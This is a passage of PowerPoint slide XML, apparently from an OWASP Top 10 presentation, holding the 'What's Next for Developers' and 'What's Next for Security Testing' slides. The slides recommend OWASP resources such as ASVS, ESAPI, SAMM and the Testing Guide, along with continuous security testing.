                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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1" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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dirty="0" smtClean="0"/>
              <a:t>A10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8623626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818709136"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="7997672"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> &amp; Use Repeatable Security Processes and Standard Security Controls</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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tr>
              <a:tr h="76166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t>Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be daunting.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t>To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>resources that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>you can use to address application security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications and APIs.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t>There are numerous additional OWASP resources available for your use. Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy or as eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a: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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s Next for Developers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-914400" y="2971800"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2971800"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2971800"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3070641"/>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en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>To produce a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>secure</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> web application, you must define what secure means for that application. OWASP recommends you use the OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>Application Security Verification Standard (ASVS)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, as a guide for setting the security requirements for your application(s). ASVS has been</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> updated significantly in the past few years, with version 3.0.1 being released </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>mid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> 2016. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>If you’re outsourcing, consider the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>OWASP Secure Software Contract Annex</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2974010"/>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r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Application Security Requirements</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="4085260"/>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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Rather than retrofitting security into your applications and APIs, it is far more cost effective to design the security in from the start. OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>OWASP Prevention Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>and the</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>OWASP Developer’s </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>Guide</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t> as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>good starting points for guidance on how to design security in from the beginning. The Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>have been updated and expanded significantly since</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> the 2013 Top 10 was released.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3988629"/>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kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Application Security Architecture</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="5099878"/>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en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Building strong and usable security controls is difficult. Using</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> set of standard security controls radically simplifies the development of secure applications and APIs. OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>OWASP Enterprise Security API (ESAPI) project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> as a model for the security APIs needed to produce secure web applications and APIs. ESAPI provides a reference implementation in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>Java</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>. Many popular frameworks come with standard security controls for authorization, validation, CSRF, etc.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5003248"/>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kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Standard Security Controls</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="6114496"/>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en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>To improve the process your organization follows when building applications and APIs, OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization. A significant update to Open SAMM was released in 2017.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6017867"/>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kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Secure Development Lifecycle</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="7129115"/>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en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>The </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>OWASP Education Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> provides training materials to help educate developers on web application security. For hands-on learning about vulnerabilities, try </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>OWASP WebGoat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>WebGoat.NET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>,  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId17"/>
                </a:rPr>
                <a:t>OWASP NodeJS Goat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, or the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>OWASP Broken Web Applications Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. To stay current, come to an </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>OWASP AppSec Conference</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, OWASP Conference Training, or local </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId20"/>
                </a:rPr>
                <a:t>OWASP Chapter meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="7032486"/>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kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Application Security Education</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>+D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>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nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="7997672"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Establish </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Continuous Application Security Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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tr>
              <a:tr h="76166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t>Building code securely is important. But it’s critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere it was supposed to be. The goal of application security testing is to provide this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approaches and tools. So we strongly encourage you to put some thought into how you are going to focus on what’s important across your entire application portfolio, and do it cost-effectively.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t>Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern software development requires </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>continuous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> application security testing across the entire software development lifecycle. Look to enhance existing development pipelines with security automation that doesn’t slow development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied by the size of your application portfolio.</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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What’s Next for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-952500" y="3657600"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2971800"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2971800"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3070641"/>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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Before you start testing, be sure you understand what’s important to spend time on. Priorities come from the threat model, so if you don’t have one, you need to create one before testing. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Consider using </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>OWASP ASVS </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>and the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>OWASP Testing Guide </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>as an input and d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t>on’t rely on tool vendors to decide what’s importan</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>t for your business. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2974010"/>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r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Understand the Threat Model</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="4085260"/>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en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Your approach to application security testing must</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> be highly compatible with the people, processes, and tools you use in your software development lifecycle (SDLC). Attempts to force extra steps, gates, and reviews are likely to cause friction, get bypassed, and struggle to scale. Look for natural opportunities to gather security information and feed it back into your process.</a:t>
              </a:r>
